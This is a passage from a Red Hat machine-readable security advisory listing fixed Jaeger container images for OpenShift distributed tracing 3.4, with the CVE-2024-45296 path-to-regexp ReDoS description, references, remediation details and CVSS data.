3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "serve-static: Improper Sanitization in serve-static" }, { "cve": "CVE-2024-45296", "cwe": { "id": "CWE-1333", "name": "Inefficient Regular Expression Complexity" }, "discovery_date": "2024-09-09T19:20:18.127723+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2310908" } ], "notes": [ { "category": "description", "text": "A flaw was found in path-to-regexp package, where it turns path strings into regular expressions. In certain cases, path-to-regexp will output a regular expression that can be exploited to cause poor performance. Because JavaScript is single-threaded and regex matching runs on the main thread, poor performance will block the event loop and lead to a denial of service (DoS).", "title": "Vulnerability description" }, { "category": "summary", "text": "path-to-regexp: Backtracking regular expressions cause ReDoS", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-45296" }, { "category": "external", "summary": "RHBZ#2310908", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-45296", "url": "https://www.cve.org/CVERecord?id=CVE-2024-45296" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45296" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f", "url": "https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6", "url": "https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6" }, { "category": "external", "summary": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j", "url": "https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j" } ], "release_date": "2024-09-09T19:15:13.330000+00:00", "remediations": [ { "category": "vendor_fix", "date": "2024-12-10T11:04:35+00:00", "details": "For details on how to apply this update, refer to:\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.17/h tml/operators/administrator-tasks#olm-upgrading-operators", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:10917" }, { "category": "workaround", "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", "product_ids": [ "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:05b0c8b5f7717aa00aecf8415c5a79aaae45fdd921f16b9b717b715abdf3d86b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:204972905b60ab8957c9bdc79a68be864b7b1e4e946c557fe3529124ad987abc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:6d56211c0cc55af6cf64b0dcb27a733994febfbf24457bb14d658db98b4dcb90_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-agent-rhel8@sha256:7b0708b8375d637c822a10733cd97fdddfd6ed1717dd83a37b50f43f28a71444_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:10857fa228035950b7ee78de526d99f4353b0bdf6f67e8412baa93d7bb8455fc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:3a9c36576f625c796e193b7f457c05adfb2bf7fe27a4a20c8dc3239d7d7d749b_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:7db951f4309125ffaf31b315dcbfaaf2a94e33e0bad34a6a98dcdf7b9b5ae76a_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-all-in-one-rhel8@sha256:b7643356dd52ad18bea1b817b192708735794f5536bf86903f7721b07095d949_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:0680a79d33d1be64996ef1713f357a03304525adda3a5b1bd902515015afe3e2_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:153a6c2b46a236577f57863da350c3f89595ecf0de6dd56eb8090741b83f6d10_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:60028cdb647f96cc8e3a49f11428a8d35b44937fdd6c6b8bafbd70d6a0a45fd6_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-collector-rhel8@sha256:912550520b81f9fcf68400dfd76d7a85f68a3fce5e95e34ee5a22a32fb5d3871_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:25dc148e3a956b8ee742d0702a0c3b5e978fefc4f1f080cf2bb273e115044303_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:2c4aafdd152511477c2bfbe1f4bc3545785e1cec7a510e9632bc9d72ea624f83_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:7975ba7f7952a874767ae327f8046c924a797cf3a60fbd21070fe3098c5493b9_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-index-cleaner-rhel8@sha256:fdb227f5425459de46782922f53ba147f67ea0a86ef2143b9b5d9bd15ba2958e_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:2372370502da86ba88aed909bcc1e768377bf540def547fe663e7b727c7ab07d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:8b8554063d8dde0c192b7a936515d4f7a3024c4f44a1c508d3d1c43cb54746cc_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:aebb7c234a589c94449a25d779b83f29ea94a67d9a15f6e5e1fa7cbb7379faa0_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-es-rollover-rhel8@sha256:f454ee35013e250d97ccf8fbd72392932a7b3cb56bc0a1e8d40e39716b41573e_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:bf8fc9009a8c2ee43c1795d9408b0b385cd99ad0601c50e1e79e6df11f57880d_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:c322e17e36003bba01af3583da5c5a5673681f47a27a3c4624353f449fbbfe80_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f2394fa49c88dd115e54de9ce42ceb6178bff1d0a2e6a1d355dc60ba77c5323c_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-ingester-rhel8@sha256:f5fbc78661bb8f6b091c521c46973aaa296e0534325d753c47a14309e06c2279_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-operator-bundle@sha256:e65dce4728a53af4e696d09b05b60a731ecb8cdba19332deb16c291f61adcdb4_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:56784b527bf1fc1a2a0f24ea9b6edea3927746cbe1b18d9c653e0be621f07911_ppc64le", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:59183275cf68d933b5eb3690ae89aacfb9e34ee85868e7a1f858684cff6dcd20_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:648d95c1a6736055910cd901c7e80d82d0e8bad71531373293144d0d6682b994_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-query-rhel8@sha256:7ce3c91962c904cffc5446c0ba6263124ea4b8a17963fbbefabacac73daf4851_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:01668273578bb232be7f478235ef9d4a85ef4eb5e0a63a405a0b7812225e053a_s390x", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:121702ab2f294b8dcfa55ecc5566dbd071368713967170bd2297ddcc49e777ea_amd64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:4f4632fc0514f19edbb7f951e598d695ce8b07ddd5830f096d87a8925646de0e_arm64", "Red Hat OpenShift distributed tracing 3.4:registry.redhat.io/rhosdt/jaeger-rhel8-operator@sha256:f6f2d00257e8409ff55194ccec35708b010225aace48d36368d8d227d4b13cc0_ppc64le" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": 